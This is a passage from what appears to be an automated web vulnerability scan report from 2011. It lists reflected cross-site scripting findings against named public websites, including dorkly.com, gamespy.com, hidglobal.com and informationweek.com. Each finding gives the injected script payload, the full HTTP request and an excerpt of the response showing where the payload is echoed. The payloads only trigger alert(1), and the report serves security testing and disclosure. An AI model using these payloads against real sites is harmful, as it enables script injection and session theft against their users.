<html><head><title>DAVIDCORN.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://www.politicsdaily.com/bloggers/david-corn?4efc8"><script>alert(1)</script>88769f13774=1" name="DAVIDCORN.COM">
...[SNIP]...

3.43. http://www.dorkly.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dorkly.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efd19"-alert(1)-"592b3cfc057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?efd19"-alert(1)-"592b3cfc057=1 HTTP/1.1
Host: www.dorkly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Sun, 28-Feb-2010 13:34:56 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=35e5f849e4fd648c6c9447eb88225ce46de82878; expires=Sun, 28-Feb-2016 18:38:47 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=35e5f849e4fd648c6c9447eb88225ce46de82878; expires=Sun, 28-Feb-2016 18:38:47 GMT; path=/; domain=dorkly.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" xmlns:fb="http://www.facebook.com/2008/fbml">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
"ctype":"other","sec":"homepage"};
       jument.ad_site = "5480.iac.dorkly";
       jument.cookie.domain = "dorkly.com";
       jument.home_url = "http://www.dorkly.com";
       jument.this_url = "http://www.dorkly.com/?efd19"-alert(1)-"592b3cfc057=1";
       jument.user_id = 0;
           </script>
...[SNIP]...

3.44. http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.electronista.com
Path:	/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df336"><script>alert(1)</script>5b462ef68bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?df336"><script>alert(1)</script>5b462ef68bb=1 HTTP/1.1
Host: www.electronista.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:12 GMT
Server: Apache
Set-Cookie: PHPSESSID=c1k5cs9qkiv9co1c1aoh22kq11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 78218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<fb:login-button length="long" onlogin="window.location = 'http://www.electronista.com//articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?df336"><script>alert(1)</script>5b462ef68bb=1';">
...[SNIP]...

3.45. http://www.emedicinehealth.com/script/main/hp.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.emedicinehealth.com
Path:	/script/main/hp.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fd1a"-alert(1)-"05fadde8b32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /script/main/hp.asp?5fd1a"-alert(1)-"05fadde8b32=1 HTTP/1.1
Host: www.emedicinehealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50538
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCADDAARB=KDOLCAEBOCBHAPPAIGFIIJPN; path=/
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:36:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>

<HEAD>
<META http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!--
var s_account = "webmdcom";
var s_pagename = "emedicinehealth.com/script/main/hp.asp?5fd1a"-alert(1)-"05fadde8b32=1";
var s_bu = "cns";
var s_siteclass = "od";
var s_site = "emedicinehealth";
var s_server_type = "MN";
var s_channel_health = "eMedicineHealth";
var s_refpath = "eMedicineHealth";
var s_server
...[SNIP]...

3.46. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fanhouse.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c4c"><script>alert(1)</script>3360a8f21eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?98c4c"><script>alert(1)</script>3360a8f21eb=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:14 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 77750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://www.fanhouse.com/?98c4c"><script>alert(1)</script>3360a8f21eb=1"/>
...[SNIP]...

3.47. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fanhouse.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfcfe"-alert(1)-"db2bbd22746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bfcfe"-alert(1)-"db2bbd22746=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:15 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 77675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fanhouse Main";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.fanhouse.com/?bfcfe"-alert(1)-"db2bbd22746=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.48. http://www.food.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.food.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ace1"-alert(1)-"68cbd1d9049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5ace1"-alert(1)-"68cbd1d9049=1 HTTP/1.1
Host: www.food.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Length: 109969
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=c7c1213e9f8670c7914fd0a08af6.foodweb01i1; Path=/
X-Powered-By: JSP/2.1
X-Cnection: close
Expires: Mon, 28 Feb 2011 13:36:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

                               <html>

<head>

   <meta http-equiv="Content-type" cont
...[SNIP]...

   if(!SNI.RZ.Sifter){
       SNI.RZ.Sifter = {}
   }
   //initialize with emptyString to make sure the Sifer Object initialized no matter what we have in the request.

   SNI.RZ.Sifter.sifter_urlParams = "5ace1"-alert(1)-"68cbd1d9049=1";

   </script>
...[SNIP]...

3.49. http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.forex-direkt.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b6ea9--><script>alert(1)</script>be43e62c830 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b6ea9--><script>alert(1)</script>be43e62c830=1 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 28 Feb 2011 13:36:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Tue, 28-Feb-2012 13:36:20 GMT; path=/
Set-Cookie: WPS_date=20110228; expires=Tue, 01-Mar-2011 13:36:20 GMT
Set-Cookie: WPS_display_count=0; expires=Tue, 01-Mar-2011 13:36:20 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head p
...[SNIP]...
<form action="http://www.forex-direkt.de/?b6ea9--><script>alert(1)</script>be43e62c830=1&subscribe=true" method="post" class="subscribeform">
...[SNIP]...

3.50. http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.forex-direkt.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46e87"><script>alert(1)</script>2aa589d6daa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46e87\"><script>alert(1)</script>2aa589d6daa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46e87"><script>alert(1)</script>2aa589d6daa=1 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Mon, 28 Feb 2011 13:36:16 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Tue, 28-Feb-2012 13:36:16 GMT; path=/
Set-Cookie: WPS_date=20110228; expires=Tue, 01-Mar-2011 13:36:16 GMT
Set-Cookie: WPS_display_count=0; expires=Tue, 01-Mar-2011 13:36:16 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head p
...[SNIP]...
<form action="http://www.forex-direkt.de/?46e87\"><script>alert(1)</script>2aa589d6daa=1&subscribe=true" method="post" class="subscribeform">
...[SNIP]...

3.51. http://www.gamespy.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespy.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 103ac"-alert(1)-"33fbd95695d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?103ac"-alert(1)-"33fbd95695d=1 HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:22 GMT
Content-Length: 12461
Connection: close
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c03-31164-59761546-7;Path=/;Domain=.gamespy.com;Expires=Tue, 27-Aug-30 13:36:22 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1298900182855v-1n-22mc+1298900182855mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html><head>
   <title>GameSpy.com Advertisement</title>
   <meta http-equ
...[SNIP]...
if(docTitle == '') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://www.gamespy.com/?103ac"-alert(1)-"33fbd95695d=1";
return true;

   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

3.52. http://www.gamespy.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespy.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39605"><script>alert(1)</script>81ff83ced4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?39605"><script>alert(1)</script>81ff83ced4e=1 HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:22 GMT
Content-Length: 12491
Connection: close
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c0a-4689-2127784655-1;Path=/;Domain=.gamespy.com;Expires=Tue, 27-Aug-30 13:36:22 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1298900182063v-1n-22mc+1298900182063mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html><head>
<title>GameSpy.com Advertisement</title>
<meta http-equ
...[SNIP]...
<A href="http://www.gamespy.com/?39605"><script>alert(1)</script>81ff83ced4e=1" CLASS="prestitial_text3">
...[SNIP]...

3.53. http://www.gamestats.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamestats.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d97"-alert(1)-"4fa0d5b0b5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29d97"-alert(1)-"4fa0d5b0b5e=1 HTTP/1.1
Host: www.gamestats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamestats.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: NGUserID=a016c06-16607-290622490-3;Path=/;Domain=.gamestats.com;Expires=Tue, 27-Aug-30 13:36:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: freq=c-1298900191752v-1n-21mc+1298900191752mv+1mn+21wwe~0;Path=/;Domain=.gamestats.com
Content-Length: 144009

<html><head>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/data.js"></script>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/util
...[SNIP]...
cript>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.gamestats.com/?29d97"-alert(1)-"4fa0d5b0b5e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

3.54. http://www.gamestats.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamestats.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21efb"><script>alert(1)</script>4afc3c5b2ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21efb"><script>alert(1)</script>4afc3c5b2ca=1 HTTP/1.1
Host: www.gamestats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:36:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:36:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamestats.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: NGUserID=a016c09-25262-1349998991-1;Path=/;Domain=.gamestats.com;Expires=Tue, 27-Aug-30 13:36:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamestats.com
Set-Cookie: freq=c-1298900190426v-1n-21mc+1298900190426mv+1mn+21wwe~0;Path=/;Domain=.gamestats.com
Content-Length: 144291

<html><head>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/data.js"></script>
<script type="text/javascript" src="http://scripts.gamestats.com/scripts/common/util
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.gamestats.com/?21efb"><script>alert(1)</script>4afc3c5b2ca=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

3.55. http://www.giga.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.giga.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21313"><script>alert(1)</script>927f81afa7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21313"><script>alert(1)</script>927f81afa7f=1 HTTP/1.1
Host: www.giga.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:30 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: PHPSESSID=08079c436ffd5481b342f301bb14be44; path=/; domain=.giga.de
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>

...[SNIP]...
<input type="hidden" name="url" value="http://www.giga.de/?21313"><script>alert(1)</script>927f81afa7f=1?" />
...[SNIP]...

3.56. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hidglobal.com
Path:	/onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ff75f--><script>alert(1)</script>0572c754cb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlineOrderStatusRegistration.php?ff75f--><script>alert(1)</script>0572c754cb3=1 HTTP/1.1
Host: www.hidglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=60cqljckjdoei6t85ca874vls3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script>0572c754cb3=1'>
...[SNIP]...

3.57. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hidglobal.com
Path:	/onlineOrderStatusRegistration.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6cceb'><script>alert(1)</script>0baa5dff093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlineOrderStatusRegistration.php?6cceb'><script>alert(1)</script>0baa5dff093=1 HTTP/1.1
Host: www.hidglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=5769ntf04fe1keua3of75j7eb7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<option value='onlineOrderStatusRegistration.php?6cceb'><script>alert(1)</script>0baa5dff093=1'>
...[SNIP]...

3.58. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd71"><script>alert(1)</script>662c06a49bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news9fd71"><script>alert(1)</script>662c06a49bf/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:40 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:40 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=ZRITCOKHS11WRQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32589



<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news9fd71"><script>alert(1)</script>662c06a49bf/security/v;kvarticleid=;kvauthor=;loc=300;grp=351939023" target="_blank">
...[SNIP]...

3.59. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.informationweek.com
Path:	/news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41182'-alert(1)-'caabbc3a43a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news41182'-alert(1)-'caabbc3a43a/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:40 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:40 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
